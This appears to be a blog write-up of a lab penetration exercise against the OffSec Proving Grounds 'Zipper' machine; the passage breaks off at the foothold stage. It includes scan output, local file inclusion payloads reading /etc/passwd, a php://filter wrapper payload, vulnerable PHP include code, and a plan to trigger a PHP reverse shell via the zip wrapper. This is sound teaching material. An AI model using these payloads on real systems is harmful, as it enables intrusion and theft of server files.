{"id":356,"date":"2024-06-21T18:26:45","date_gmt":"2024-06-21T18:26:45","guid":{"rendered":"https:\/\/bencron.com\/?p=356"},"modified":"2024-06-25T18:54:20","modified_gmt":"2024-06-25T18:54:20","slug":"zipper-offsec-proving-grounds-practice-hard","status":"publish","type":"post","link":"https:\/\/bencron.com\/?p=356","title":{"rendered":"Zipper &#8211; OffSec Proving Grounds (Practice)"},"content":{"rendered":"\n<h2 class=\"wp-block-heading has-text-align-center\">The Summary<\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Platform Site<\/strong><\/td><td>OffSec Proving Grounds (Practice)<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Hostname<\/strong><\/td><td>zipper<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Domain<\/strong><\/td><td>zipper.offsec<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Operating System \/ Architecture<\/strong><\/td><td>Linux<\/td><\/tr><tr><td class=\"has-text-align-right\" data-align=\"right\"><strong>Rating<\/strong><\/td><td>Hard<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>This write-up is for the machine Zipper on the OffSec Proving Grounds (Practice) labs. I will show about PHP wrappers and take the machine al the way through Privilege Escalation.<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">The Attack<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Scanning &amp; Prelims<\/h3>\n\n\n\n<p>NMAP Command<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -T4 -A -p- xx.xx.xx.xx -oA nmap-XXXXXX --webxml<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>nmap<\/code> &#8211;&gt; the application<\/li>\n\n\n\n<li><code>-T4<\/code> &#8211;&gt; timing set to aggressive (4)<\/li>\n\n\n\n<li><code>-A -p-<\/code> &#8211;&gt; enables all scans &amp; scans all ports<\/li>\n\n\n\n<li><code>xx.xx.xx.xx<\/code> &#8211;&gt; target IP address<\/li>\n\n\n\n<li><code>-oA<\/code> &#8211;&gt; output All file types: normal, grepable, XML<\/li>\n\n\n\n<li><code>nmap-XXXXXX<\/code> &#8211;&gt; names of output files (XXXX changes per testers choice)<\/li>\n\n\n\n<li><code>--webxml<\/code> &#8211;&gt; can move &amp; view the XML easily on another machine<\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;--cbp-line-number-width:calc(2 * 0.6 * .875rem);line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">NMAP &#8211; Output<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Host is up (0.095s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Zipper\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.93%E=4%D=5\/22%OT=22%CT=1%CU=39495%PV=Y%DS=4%DC=T%G=Y%TM=664E04A\nOS:B%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(SP=1\nOS:01%GCD=1%ISR=10E%TI=Z%TS=A)OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT1\nOS:1NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE\nOS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=\nOS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y\nOS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=16\nOS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=893B%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 4 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">Host is up (0.095s latency).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Not shown: 65533 closed tcp ports (reset)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">PORT   STATE SERVICE VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">| ssh-hostkey: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-title: Zipper<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">No exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">TCP\/IP fingerprint:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:SCAN(V=7.93%E=4%D=5\/22%OT=22%CT=1%CU=39495%PV=Y%DS=4%DC=T%G=Y%TM=664E04A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(SP=1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:01%GCD=1%ISR=10E%TI=Z%TS=A)OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:1NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=893B%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Network Distance: 4 hops<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>While scanning I set up notes for this machine. I also edit the <code>\/etc\/hosts<\/code> file in Kali to associate a domain of my choosing to the IP address provided by the Platform Site. The entry is often added to during testing when new domains are found.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Service Enumeration<\/h3>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">SSH<\/span><span role=\"button\" tabindex=\"0\" data-code=\"22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)\n|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)\n|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">| ssh-hostkey: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   3072 c1994b952225ed0f8520d363b448bbcf (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|   256 0f448badad95b8226af036ac19d00ef3 (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_  256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>&#8220;It&#8217;s never SSH.&#8221; One day the problem will be SSH, but not today.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#2e2e2e;color:#d5ffff\">HTTP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Zipper\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-title: Zipper<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">|_http-server-header: Apache\/2.4.41 (Ubuntu)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>HTTP is always a good jumping off point. Let&#8217;s browse to the site and also check Wappalyzer.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"931\" height=\"574\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69.png\" alt=\"\" class=\"wp-image-360\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69.png 931w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69-300x185.png 300w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-69-768x474.png 768w\" sizes=\"auto, (max-width: 931px) 100vw, 931px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"407\" height=\"479\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72.png\" alt=\"\" class=\"wp-image-363\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72.png 407w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-72-255x300.png 255w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/figure>\n\n\n\n<p>At this point it is a good idea to run a directory search using one of the many tools available. I like <code>dirsearch<\/code> at the moment, but preferences vary and change with time. Wappalyzer also shows the existence of PHP being used. So, I will look for directories along with <code>.php<\/code> files and some other file extensions to cover my bases. The <code>dirsearch<\/code> output file is below.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"# Dirsearch started Wed May 22 10:47:47 2024 as: dirsearch.py -u http:\/\/zipper.offsec -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -f -e php,txt,bak -o \/root\/OffSec_Proving_Grounds\/Zipper\/dirsearch_output_Zipper.txt\n\n200     3KB  http:\/\/zipper.offsec:80\/index.php\n200     3KB  http:\/\/zipper.offsec:80\/home.php\n403   278B   http:\/\/zipper.offsec:80\/icons\/\n403   278B   http:\/\/zipper.offsec:80\/uploads\/\n301   316B   http:\/\/zipper.offsec:80\/uploads    -&gt; REDIRECTS TO: http:\/\/zipper.offsec\/uploads\/\n200     0B   http:\/\/zipper.offsec:80\/upload.php\n200   155B   http:\/\/zipper.offsec:80\/style\n403   278B   http:\/\/zipper.offsec:80\/server-status\/\n403   278B   http:\/\/zipper.offsec:80\/server-status\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #545454; font-style: italic\"># Dirsearch started Wed May 22 10:47:47 2024 as: dirsearch.py -u http:\/\/zipper.offsec -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -f -e php,txt,bak -o \/root\/OffSec_Proving_Grounds\/Zipper\/dirsearch_output_Zipper.txt<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     3KB  http:\/\/zipper.offsec:80\/index.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     3KB  http:\/\/zipper.offsec:80\/home.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/icons\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/uploads\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">301   316B   http:\/\/zipper.offsec:80\/uploads    -&gt; REDIRECTS TO: http:\/\/zipper.offsec\/uploads\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200     0B   http:\/\/zipper.offsec:80\/upload.php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">200   155B   http:\/\/zipper.offsec:80\/style<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/server-status\/<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">403   278B   http:\/\/zipper.offsec:80\/server-status<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Clicking the &#8220;Home&#8221; button on the site brings up something interesting in the address bar. Seeing a <code>file=<\/code> is a good indicator of potential directory traversal or LFI (Local File Inclusion)<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"467\" height=\"162\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71.png\" alt=\"\" class=\"wp-image-362\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71.png 467w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-71-300x104.png 300w\" sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/figure>\n\n\n\n<p>I found the <a href=\"https:\/\/owasp.org\/www-project-web-security-testing-guide\/v42\/4-Web_Application_Security_Testing\/07-Input_Validation_Testing\/11.1-Testing_for_Local_File_Inclusion\" target=\"_blank\" rel=\"noopener\" title=\"\">OWASP WSTG<\/a> (Web Site Testing Guide) to be helpful here. Checked for the standard <code>..\/..\/etc\/passwd<\/code> and tried to view the <code>upload.php<\/code> file that was revealed in our dirsearch output.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"156\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73.png\" alt=\"\" class=\"wp-image-364\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73.png 531w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-73-300x88.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"524\" height=\"157\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76.png\" alt=\"\" class=\"wp-image-367\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76.png 524w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-76-300x90.png 300w\" sizes=\"auto, (max-width: 524px) 100vw, 524px\" \/><\/figure>\n\n\n\n<p>However, exploring the OWASP site a bit more brings us to a section on <code>PHP wrappers<\/code>. These can allow an attacker to upgrade a LFI to Remote Code Execution (RCE) or other possibilities. A wrapper is a bit of code that surrounds (&#8220;wraps&#8221;) other code to give some added functionality. PHP has several <a href=\"https:\/\/www.php.net\/manual\/en\/wrappers.php\" target=\"_blank\" rel=\"noopener\" title=\"\">built-in wrappers<\/a> and an example is given. The following wrapper should access a file, encodes it in Base64 and prints it to the browser screen. It should be placed after the equal (=) sign in the URL.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"php:\/\/filter\/convert.base64-encode\/resource=FILENAME\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #EEFFFF\">php:\/\/filter\/convert.base64-encode\/resource=FILENAME<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"623\" height=\"121\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77.png\" alt=\"\" class=\"wp-image-368\" srcset=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77.png 623w, https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-77-300x58.png 300w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/figure>\n\n\n\n<p>Decoding the Base64 string (I use Cyberchef) reveals the file contents.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span role=\"button\" tabindex=\"0\" data-code=\"&lt;?php\n$file = $_GET['file'];\nif(isset($file))\n{\n    include(&quot;$file&quot;.&quot;.php&quot;);\n}\nelse\n{\ninclude(&quot;home.php&quot;);\n}\n?&gt;\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #89DDFF\">&lt;?<\/span><span style=\"color: #EEFFFF\">php<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">$<\/span><span style=\"color: #EEFFFF\">file <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #89DDFF\">$<\/span><span style=\"color: #EEFFFF\">_GET<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">file<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">];<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #82AAFF\">isset<\/span><span style=\"color: #89DDFF\">($<\/span><span style=\"color: #EEFFFF\">file<\/span><span style=\"color: #89DDFF\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #EEFFFF\">    <\/span><span style=\"color: #89DDFF; font-style: italic\">include<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;$<\/span><span style=\"color: #EEFFFF\">file<\/span><span style=\"color: #89DDFF\">&quot;.&quot;<\/span><span style=\"color: #C3E88D\">.php<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">else<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">include<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">home.php<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">?&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">The Foothold<\/h3>\n\n\n\n<p>Further research into PHP wrappers reveals an interesting zip wrapper. Use of it will access a zip file in the archives. This could trigger a malicious file, let&#8217;s say a PHP reverse shell. We can be fairly certain it will execute due to the existence of PHP already running on the machine.<\/p>\n\n\n\n<p>First we must get the zipped file onto the machine. Let&#8217;s play with the zip function on the Zipper site. A handful of test files were created and will be loaded into Zipper.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"707\" height=\"149\" src=\"https:\/\/bencron.com\/wp-content\/uploads\/2024\/06\/image-78.png\" 